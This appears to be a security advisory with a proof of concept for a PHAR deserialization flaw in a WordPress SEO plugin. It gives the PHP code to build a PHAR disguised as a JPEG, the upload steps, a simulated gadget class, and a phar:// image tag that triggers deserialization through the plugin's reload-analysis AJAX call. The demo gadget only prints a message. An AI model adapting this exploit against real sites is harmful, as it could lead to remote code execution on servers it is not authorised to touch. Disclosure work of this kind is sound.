The plugin does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.
1. Use a WordPress instance on PHP 7.x.
2. Create a PHP file `create_phar.php` with the following code:
<?php
class Evil {}
// create new Phar
$phar = new Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.png', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Evil());
$phar->stopBuffering();
3. Create the PHAR file `poc.phar` by running `php --define phar.readonly=0 create_phar.php`
4. Rename `poc.phar` to `poc.jpg`
5. Upload `poc.jpg` using the Media Editor. Take note of its path within `wp-content/uploads`
6. Add the following code to the site in order to simulate a gadget:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
7. Create or edit a post or page in the block editor. Add an `HTML` block with the following contents (but replace any parts of the path to `poc.jpg` as needed for your test server).
<img src="phar://../wp-content/uploads/2023/03/poc.jpg/test.txt">
8. Without saving the post or page, open the browser console to view network traffic, then click on “Reload Analysis” in the “SEO Page Optimization” section. Notice the `admin-ajax` request with `action=wpms` and `task=reload_analysis` returns with the text “Arbitrary deserialization”, demonstrating the vulnerability.